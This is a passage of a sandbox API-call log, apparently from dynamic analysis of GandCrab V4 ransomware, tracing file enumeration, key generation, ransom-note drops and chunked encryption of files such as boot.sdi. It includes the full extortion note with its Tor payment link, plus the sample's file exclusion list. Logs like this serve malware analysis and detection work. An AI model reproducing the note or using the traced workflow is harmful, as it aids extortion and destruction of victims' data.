zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0041.465] WriteFile (in: hFile=0x324, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f720, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f720*=0x1f6e, lpOverlapped=0x0) returned 1 [0041.466] CloseHandle (hObject=0x324) returned 1 [0041.466] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.466] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.467] GetSystemTime (in: lpSystemTime=0x3030400 | out: lpSystemTime=0x3030400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2c, wSecond=0x30, wMilliseconds=0x29c)) [0041.467] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0041.467] GetWindowsDirectoryW (in: lpBuffer=0x3040000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0041.467] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3040200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x3040600, lpMaximumComponentLength=0x3040608, lpFileSystemFlags=0x3040604, lpFileSystemNameBuffer=0x3040400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x3040600*=0xd2ca4def, lpMaximumComponentLength=0x3040608*=0xff, lpFileSystemFlags=0x3040604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0041.467] wsprintfW (in: param_1=0x3030000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Recovery\\d2ca4a08d2ca4dee3d.lock") returned 35 [0041.467] CreateFileW (lpFileName="C:\\Recovery\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\recovery\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x360 [0041.566] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.567] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.567] lstrlenW (lpString="C:\\Recovery\\") returned 12 [0041.567] lstrcatW (in: lpString1="C:\\Recovery\\", lpString2="*" | out: lpString1="C:\\Recovery\\*") returned="C:\\Recovery\\*" [0041.567] FindFirstFileW (in: lpFileName="C:\\Recovery\\*", lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 0xf8a488 [0041.567] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0041.567] FindNextFileW (in: hFindFile=0xf8a488, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.567] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0041.567] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.567] FindNextFileW (in: hFindFile=0xf8a488, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.567] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0041.567] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0041.567] lstrcatW (in: lpString1="C:\\Recovery\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Recovery\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Recovery\\d2ca4a08d2ca4dee3d.lock" [0041.567] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.568] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Recovery\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 40 [0041.568] lstrlenW (lpString="C:\\Recovery\\d2ca4a08d2ca4dee3d.lock") returned 35 [0041.568] lstrlenW (lpString=".lock") returned 5 [0041.568] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0041.568] wsprintfW (in: param_1=0x3040000, param_2="%s " | out: param_1=".lock ") returned 6 [0041.568] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.568] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.568] FindNextFileW (in: hFindFile=0xf8a488, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.569] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0041.569] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0041.569] lstrcatW (in: lpString1="C:\\Recovery\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Recovery\\KRAB-DECRYPT.txt") returned="C:\\Recovery\\KRAB-DECRYPT.txt" [0041.569] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.569] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Recovery\\KRAB-DECRYPT.txt.KRAB") returned 33 [0041.569] lstrlenW (lpString="C:\\Recovery\\KRAB-DECRYPT.txt") returned 28 [0041.569] lstrlenW (lpString=".txt") returned 4 [0041.569] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0041.569] wsprintfW (in: param_1=0x3040000, param_2="%s " | out: param_1=".txt ") returned 5 [0041.569] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.570] lstrlenW (lpString="C:\\Recovery\\KRAB-DECRYPT.txt") returned 28 [0041.570] lstrlenW (lpString="C:\\Recovery\\KRAB-DECRYPT.txt") returned 28 [0041.570] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0041.570] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0041.570] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0041.570] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0041.570] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0041.570] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0041.570] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0041.570] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0041.570] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0041.570] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0041.570] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.570] FindNextFileW (in: hFindFile=0xf8a488, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.570] lstrcmpW (lpString1="WindowsRE", lpString2=".") returned 1 [0041.570] lstrcmpW (lpString1="WindowsRE", lpString2="..") returned 1 [0041.570] lstrcatW (in: lpString1="C:\\Recovery\\", lpString2="WindowsRE" | out: lpString1="C:\\Recovery\\WindowsRE") returned="C:\\Recovery\\WindowsRE" [0041.570] lstrcatW (in: lpString1="C:\\Recovery\\WindowsRE", lpString2="\\" | out: lpString1="C:\\Recovery\\WindowsRE\\") returned="C:\\Recovery\\WindowsRE\\" [0041.570] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0041.570] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0041.570] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0041.571] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0041.571] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0041.571] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.571] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.571] wsprintfW (in: param_1=0x3030200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Recovery\\WindowsRE\\\\KRAB-DECRYPT.txt") returned 39 [0041.571] CreateFileW (lpFileName="C:\\Recovery\\WindowsRE\\\\KRAB-DECRYPT.txt" (normalized: "c:\\recovery\\windowsre\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0041.572] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0041.572] WriteFile (in: hFile=0x368, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f4a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f4a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0041.573] CloseHandle (hObject=0x368) returned 1 [0041.573] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.573] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.573] GetSystemTime (in: lpSystemTime=0x3030400 | out: lpSystemTime=0x3030400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2c, wSecond=0x30, wMilliseconds=0x309)) [0041.573] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0041.574] GetWindowsDirectoryW (in: lpBuffer=0x3040000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0041.574] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3040200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x3040600, lpMaximumComponentLength=0x3040608, lpFileSystemFlags=0x3040604, lpFileSystemNameBuffer=0x3040400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x3040600*=0xd2ca4def, lpMaximumComponentLength=0x3040608*=0xff, lpFileSystemFlags=0x3040604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0041.574] wsprintfW (in: param_1=0x3030000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Recovery\\WindowsRE\\d2ca4a08d2ca4dee3d.lock") returned 45 [0041.574] CreateFileW (lpFileName="C:\\Recovery\\WindowsRE\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\recovery\\windowsre\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x368 [0041.593] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.593] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.594] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\") returned 22 [0041.594] lstrcatW (in: lpString1="C:\\Recovery\\WindowsRE\\", lpString2="*" | out: lpString1="C:\\Recovery\\WindowsRE\\*") returned="C:\\Recovery\\WindowsRE\\*" [0041.594] FindFirstFileW (in: lpFileName="C:\\Recovery\\WindowsRE\\*", lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 0xf8a4c8 [0041.594] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0041.594] FindNextFileW (in: hFindFile=0xf8a4c8, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0041.594] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0041.594] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.594] FindNextFileW (in: hFindFile=0xf8a4c8, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0041.594] lstrcmpW (lpString1="boot.sdi", lpString2=".") returned 1 [0041.594] lstrcmpW (lpString1="boot.sdi", lpString2="..") returned 1 [0041.594] lstrcatW (in: lpString1="C:\\Recovery\\WindowsRE\\", lpString2="boot.sdi" | out: lpString1="C:\\Recovery\\WindowsRE\\boot.sdi") returned="C:\\Recovery\\WindowsRE\\boot.sdi" [0041.594] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.594] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Recovery\\WindowsRE\\boot.sdi.KRAB") returned 35 [0041.594] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\boot.sdi") returned 30 [0041.594] lstrlenW (lpString=".sdi") returned 4 [0041.594] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0041.595] wsprintfW (in: param_1=0x3040000, param_2="%s " | out: param_1=".sdi ") returned 5 [0041.595] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.595] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\boot.sdi") returned 30 [0041.595] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\boot.sdi") returned 30 [0041.595] lstrcmpiW (lpString1="boot.sdi", lpString2="desktop.ini") returned -1 [0041.595] lstrcmpiW (lpString1="boot.sdi", lpString2="autorun.inf") returned 1 [0041.595] lstrcmpiW (lpString1="boot.sdi", lpString2="ntuser.dat") returned -1 [0041.595] lstrcmpiW (lpString1="boot.sdi", lpString2="iconcache.db") returned -1 [0041.595] lstrcmpiW (lpString1="boot.sdi", lpString2="bootsect.bak") returned -1 [0041.595] lstrcmpiW (lpString1="boot.sdi", lpString2="boot.ini") returned 1 [0041.595] lstrcmpiW (lpString1="boot.sdi", lpString2="ntuser.dat.log") returned -1 [0041.595] lstrcmpiW (lpString1="boot.sdi", lpString2="thumbs.db") returned -1 [0041.595] lstrcmpiW (lpString1="boot.sdi", lpString2="KRAB-DECRYPT.html") returned -1 [0041.595] lstrcmpiW (lpString1="boot.sdi", lpString2="KRAB-DECRYPT.txt") returned -1 [0041.595] lstrcmpiW (lpString1="boot.sdi", lpString2="CRAB-DECRYPT.txt") returned -1 [0041.595] lstrcmpiW (lpString1="boot.sdi", lpString2="ntldr") returned -1 [0041.595] lstrcmpiW (lpString1="boot.sdi", lpString2="NTDETECT.COM") returned -1 [0041.595] lstrcmpiW (lpString1="boot.sdi", lpString2="Bootfont.bin") returned -1 [0041.595] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0041.596] CryptAcquireContextW (in: phProv=0x338f3b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3b4*=0xf96000) returned 1 [0041.596] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x35e0000 [0041.596] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0041.597] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0041.597] CryptGenRandom (in: hProv=0xf96000, dwLen=0x20, pbBuffer=0x338f44c | out: pbBuffer=0x338f44c) returned 1 [0041.597] CryptReleaseContext (hProv=0xf96000, dwFlags=0x0) returned 1 [0041.597] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.597] CryptAcquireContextW (in: phProv=0x338f3b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3b4*=0xf95de0) returned 1 [0041.597] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x35e0000 [0041.598] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0041.598] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0041.598] CryptGenRandom (in: hProv=0xf95de0, dwLen=0x8, pbBuffer=0x338f46c | out: pbBuffer=0x338f46c) returned 1 [0041.598] CryptReleaseContext (hProv=0xf95de0, dwFlags=0x0) returned 1 [0041.598] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.598] CryptAcquireContextW (in: phProv=0x338f3ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3ac*=0xf96198) returned 1 [0041.599] CryptImportKey (in: hProv=0xf96198, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f3b0 | out: phKey=0x338f3b0*=0xf8a0c8) returned 1 [0041.599] CryptGetKeyParam (in: hKey=0xf8a0c8, dwParam=0x8, pbData=0x338f3a4, pdwDataLen=0x338f3a8, dwFlags=0x0 | out: pbData=0x338f3a4*=0x800, pdwDataLen=0x338f3a8*=0x4) returned 1 [0041.599] CryptEncrypt (in: hKey=0xf8a0c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3040000*, pdwDataLen=0x338f3dc*=0xc8, dwBufLen=0x100 | out: pbData=0x3040000*, pdwDataLen=0x338f3dc*=0x100) returned 1 [0041.599] GetLastError () returned 0x0 [0041.599] CryptDestroyKey (hKey=0xf8a0c8) returned 1 [0041.599] CryptReleaseContext (hProv=0xf96198, dwFlags=0x0) returned 1 [0041.599] CryptAcquireContextW (in: phProv=0x338f3ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3ac*=0xf966e8) returned 1 [0041.600] CryptImportKey (in: hProv=0xf966e8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f3b0 | out: phKey=0x338f3b0*=0xf8a0c8) returned 1 [0041.600] CryptGetKeyParam (in: hKey=0xf8a0c8, dwParam=0x8, pbData=0x338f3a4, pdwDataLen=0x338f3a8, dwFlags=0x0 | out: pbData=0x338f3a4*=0x800, pdwDataLen=0x338f3a8*=0x4) returned 1 [0041.600] CryptEncrypt (in: hKey=0xf8a0c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3040100*, pdwDataLen=0x338f3dc*=0xc8, dwBufLen=0x100 | out: pbData=0x3040100*, pdwDataLen=0x338f3dc*=0x100) returned 1 [0041.600] GetLastError () returned 0x0 [0041.600] CryptDestroyKey (hKey=0xf8a0c8) returned 1 [0041.600] CryptReleaseContext (hProv=0xf966e8, dwFlags=0x0) returned 1 [0041.600] CreateFileW (lpFileName="C:\\Recovery\\WindowsRE\\boot.sdi" (normalized: "c:\\recovery\\windowsre\\boot.sdi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0041.601] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0041.601] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x36f0000 [0041.601] ReadFile (in: hFile=0x370, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0041.803] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0041.803] WriteFile (in: hFile=0x370, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0042.161] ReadFile (in: hFile=0x370, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0042.176] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0042.176] WriteFile (in: hFile=0x370, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, 